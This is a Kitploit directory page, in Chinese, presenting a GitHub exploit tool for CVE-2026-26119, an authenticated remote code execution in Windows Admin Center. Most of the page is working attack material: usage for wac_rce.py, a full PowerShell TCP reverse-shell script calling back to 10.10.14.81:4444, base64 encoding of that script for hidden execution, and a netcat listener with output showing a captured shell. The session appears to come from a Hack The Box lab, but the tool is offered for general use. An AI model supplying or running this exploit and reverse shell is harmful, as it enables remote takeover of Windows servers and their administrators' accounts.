Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-26119 — 针对 Windows Admin Center 的经过身份验证的远程代码执行利用程序,通过 WinREST/PowerShell invokeCommand 实现;接收凭据并运行任意 PowerShell 命令,包括编码的反向 Shell。 | Kitploit
工具/GitHubGitHub/cyb3rwitch3r/cve-2026-26119
漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubcyb3rwitch3r/cve-2026-26119

CVE-2026-26119

针对 Windows Admin Center 的经过身份验证的远程代码执行利用程序,通过 WinREST/PowerShell invokeCommand 实现;接收凭据并运行任意 PowerShell 命令,包括编码的反向 Shell。

查看仓库
111天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-26119

WAC RCE - CVE-2026-26119 通过 WinREST/PowerShell invokeCommand 实现 Windows Admin Center 认证后的远程代码执行(RCE)。

用法:

root@kitploit:~
    python3 wac_rce.py <user> <pass> "<powershell command>"
    WAC_PASS=<pass> python3 wac_rce.py <user>

环境变量:

root@kitploit:~
    WAC_BASE  - override target base URL (default below)
    WAC_PASS  - password, used if not passed positionally

root@kitploit:~
┌──(pwn㉿pwn)-[~/HTB/DanglingTree]
└─$ python3 wac_rce.py 'anderson.w' 'Password' 'whoami'      
danglingtree\anderson.w

如何获取反弹 Shell:

root@kitploit:~
cat > revshell.ps1 << 'EOF'                                      
$client = New-Object System.Net.Sockets.TCPClient('10.10.14.81',4444)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535 | % {0}
while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i)
    $sendback = (iex $data 2>&1 | Out-String)
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
    $stream.Write($sendbyte,0,$sendbyte.Length)
    $stream.Flush()
}
$client.Close()
EOF
root@kitploit:~
cat revshell.ps1 | iconv -t utf-16le | base64 -w 0 > revshell.b64

创建一个 nc 监听器:

root@kitploit:~
nc -nlvp 4444
root@kitploit:~
python3 wac_rce.py 'anderson.w' 'Password' "Start-Process powershell -WindowStyle Hidden -ArgumentList '-nop -enc $(cat revshell.b64)'"
root@kitploit:~
┌──(pwn㉿pwn)-[~/HTB/DanglingTree]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.81] from (UNKNOWN) [10.129.171.81] 54318
$Host.UI.RawUI.WindowTitle = "shell"
PS C:\Users\anderson.w\Documents>
下载工具